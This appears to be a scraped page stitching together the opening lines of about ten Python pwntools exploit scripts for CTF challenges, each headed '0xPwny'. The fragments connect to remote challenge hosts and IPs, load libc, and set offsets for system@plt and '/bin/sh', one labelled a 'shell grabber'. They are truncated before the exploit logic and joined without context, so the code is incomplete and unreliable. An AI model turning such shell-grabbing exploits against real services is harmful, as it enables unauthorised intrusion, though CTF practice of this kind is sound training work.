0xPwny

#!/usr/bin/python

from pwn import *

r = remote("pwnhost.local",7331)
#r = process("./babyheap")

def alloc(size):
        r.sendline("1")
        r.recvuntil("Size:")

0xPwny

from pwn import *

#RUN IT AND [HOPE] IT WILL JUMP TO YOUR [ROP] :D

r = process("./ch2")

pause()

r.recvuntil("ID:")

0xPwny

#!/usr/bin/python

from pwn import *

#Dirty script but respect it its a shell grabber ;)

r = remote("172.21.2.200",3333)
r.recvuntil(":")
leak = int(r.recvline().split(",")[0])

0xPwny

from pwn import *

_author_ = "ABDELJALIL NOUIRI"

r = remote("172.21.2.200",5555)

func_offset = 0x0000000000000B30
systemplt_offset = 0x000000000000960
binsh_offset = 0x0000000000001002

0xPwny

#!/usr/bin/pyhon

"""
.data:0000000000201020 off_201020      dq 100000078h           ; DATA XREF: sub_8CA+71↑o
.data:0000000000201028                 dq 200000069h
.data:0000000000201030                 dq 30000006Fh
.data:0000000000201038                 dq 40000006Dh
.data:0000000000201040                 dq 500000061h
.data:0000000000201048                 dq 600000072h
.data:0000000000201050                 dq 700000061h

0xPwny

from pwn import *

###LOCAL
#r = process("./vuln")
#libc = ELF("/lib/i386-linux-gnu/libc.so.6")

###REMOTE

r =remote("35.198.98.140",45067)
libc = ELF("libc.so.6")

0xPwny

#!/usr/bin/python

from pwn import *


#r = remote("192.168.4.88",9001)

r = process("./secretfile")
def pwn():
	pld = "B" * 256

0xPwny

from pwn import *
from libformatstr import *

file = ELF("./32_new")
flag = 0x0804870b

r = remote("163.172.176.29",9035)

r.recvuntil("name?")

0xPwny

from pwn import *

#r = process("./32_chal")

r = remote("163.172.176.29",9036)

file = ELF("./32_chal")
libc = ELF("libc.so.6")
#libc = ELF('/lib/i386-linux-gnu/libc.so.6')

0xPwny

from pwn import *
import struct

#r = process("./scv")
r = remote("pwn.chal.csaw.io",3764)

libc = ELF("libc-2.23.so")

readgot = 0x0602030  
puts =0x04008d0